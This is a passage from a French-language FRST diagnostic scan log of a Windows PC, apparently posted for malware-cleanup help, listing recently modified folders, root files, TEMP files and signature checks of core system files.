2016-07-20 15:39 - 
2014-09-27 15:24 - 00002472 _____ C:\Users\Arnaud\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2016-07-19 10:06 - 2014-09-27 15:28 - 00000000 ___RD C:\Program Files\Skype 2016-07-19 10:06 - 2014-09-27 15:28 - 00000000 ____D C:\ProgramData\Skype 2016-07-15 16:20 - 2015-09-11 10:00 - 00000000 ____D C:\Program Files\SuperCopier3 2016-07-14 11:11 - 2015-11-27 11:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\腾讯软件 2016-07-14 11:11 - 2015-11-27 09:49 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\腾讯软件 2016-07-14 11:11 - 2015-10-02 11:05 - 00000000 ____D C:\ProgramData\Tencent 2016-07-13 12:47 - 2016-03-03 16:27 - 00000000 ____D C:\output 2016-07-13 12:47 - 2016-03-03 16:26 - 00000000 ____D C:\PDF2JPG 2016-07-13 12:47 - 2015-12-02 16:44 - 00000000 ____D C:\temp 2016-07-13 12:47 - 2015-10-12 11:23 - 00000000 ____D C:\QMDownload 2016-07-13 12:47 - 2015-04-22 09:48 - 00000000 ____D C:\MSDEV 2016-07-13 12:47 - 2015-03-24 15:34 - 00000000 ____D C:\VC 2016-07-13 12:47 - 2015-02-08 18:46 - 00000000 ____D C:\tmp 2016-07-13 12:47 - 2015-02-08 18:46 - 00000000 ____D C:\Cast3M 2016-07-13 12:47 - 2014-12-26 19:20 - 00000000 ____D C:\watcom-1.3 2016-07-13 12:47 - 2014-10-05 18:43 - 00000000 ____D C:\Photoshine 2016-07-13 12:47 - 2014-10-05 18:31 - 00000000 ____D C:\DICOBAT 2016-07-13 12:47 - 2014-09-30 10:03 - 00000000 ____D C:\SolidWorks Data 2016-07-13 12:47 - 2014-09-30 09:27 - 00000000 ____D C:\dessins 2016-07-13 12:46 - 2014-11-16 19:11 - 00000000 ____D C:\Autodesk 2016-07-13 12:46 - 2014-09-27 15:23 - 00000000 ____D C:\CamersoftOutput 2016-07-13 12:44 - 2015-10-16 10:54 - 00039928 _____ (Tencent) C:\Windows\system32\Drivers\TS888.sys 2016-07-13 12:44 - 2015-10-02 11:19 - 00000000 ____D C:\ProgramData\TXQMPC 2016-06-28 15:32 - 2009-07-14 03:37 - 00000000 __RHD C:\Users\Public\Libraries 2016-06-28 15:27 - 2015-10-13 13:35 - 00000000 ____D C:\ProgramData\BlueStacksSetup 2016-06-28 10:52 - 
2009-07-14 03:37 - 00000000 ____D C:\Windows\system32\Setup 2016-06-27 15:19 - 2015-10-02 11:06 - 00000000 ____D C:\Users\Arnaud\AppData\Roaming\Tencent ==================== Fichiers à la racine de certains dossiers ======= 2015-03-28 20:09 - 2015-03-28 20:09 - 0001424 _____ () C:\Program Files\DeIsL1.isu 2015-10-07 10:56 - 2015-10-07 10:56 - 4875861 _____ () C:\Program Files\Common Files\umxmajzc.exe 2016-05-09 19:14 - 2016-07-25 11:08 - 0011264 _____ () C:\Users\Arnaud\AppData\Roaming\CDRusersDB.v12 2014-09-30 17:53 - 2014-11-13 07:05 - 0000141 _____ () C:\Users\Arnaud\AppData\Roaming\default.rss 2015-11-27 09:50 - 2015-11-27 09:50 - 0005120 _____ () C:\Users\Arnaud\AppData\Roaming\GiftBag.db 2015-05-07 14:03 - 2015-05-27 04:00 - 0001612 _____ () C:\Users\Arnaud\AppData\Roaming\gnuplot_history 2014-10-04 08:37 - 2015-03-01 23:13 - 0005120 _____ () C:\Users\Arnaud\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini 2016-07-22 15:38 - 2016-07-22 15:38 - 0000036 _____ () C:\Users\Arnaud\AppData\Local\housecall.guid.cache 2015-10-02 10:12 - 2015-10-02 10:11 - 0000187 _____ () C:\Users\Arnaud\AppData\Local\Matity.exe.config 2016-07-24 20:18 - 2016-07-24 20:18 - 0000000 ____H () C:\ProgramData\cm-lock 2014-09-29 06:13 - 2014-09-29 06:13 - 0000147 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.351.32.bc 2015-10-12 11:55 - 2015-10-12 11:55 - 0000080 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc 2016-07-13 12:47 - 2016-07-13 12:47 - 0001206 _____ () C:\ProgramData\ProgramData.lnk.lnk Certains fichiers dans TEMP: ==================== C:\Users\Arnaud\AppData\Local\Temp\AcDeltree.exe C:\Users\Arnaud\AppData\Local\Temp\cdo1278827091.dll C:\Users\Arnaud\AppData\Local\Temp\cdo2045704564.dll C:\Users\Arnaud\AppData\Local\Temp\cdo4272549365.dll C:\Users\Arnaud\AppData\Local\Temp\Checkupdate.exe C:\Users\Arnaud\AppData\Local\Temp\Foxit Reader Updater.exe C:\Users\Arnaud\AppData\Local\Temp\gcapi_dll.dll C:\Users\Arnaud\AppData\Local\Temp\gtapi_signed.dll 
C:\Users\Arnaud\AppData\Local\Temp\PCMgr_Setup_11_4_17347_218.exe
C:\Users\Arnaud\AppData\Local\Temp\PCMgr_Setup_11_6_17645_227.exe
C:\Users\Arnaud\AppData\Local\Temp\SkypeSetup.exe

==================== Bamital & volsnap =================

(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)

C:\Windows\explorer.exe => Le fichier est signé numériquement
C:\Windows\system32\winlogon.exe => Le fichier est signé numériquement
C:\Windows\system32\wininit.exe => Le fichier est signé numériquement
C:\Windows\system32\svchost.exe => Le fichier est signé numériquement
C:\Windows\system32\services.exe => Le fichier est signé numériquement
C:\Windows\system32\User32.dll => Le MD5 est légitime
C:\Windows\system32\userinit.exe => Le fichier est signé numériquement
C:\Windows\system32\rpcss.dll => Le fichier est signé numériquement
C:\Windows\system32\dnsapi.dll => Le fichier est signé numériquement
C:\Windows\system32\Drivers\volsnap.sys => Le fichier est signé numériquement

LastRegBack: 2016-07-18 12:20

==================== Fin de FRST.txt ============================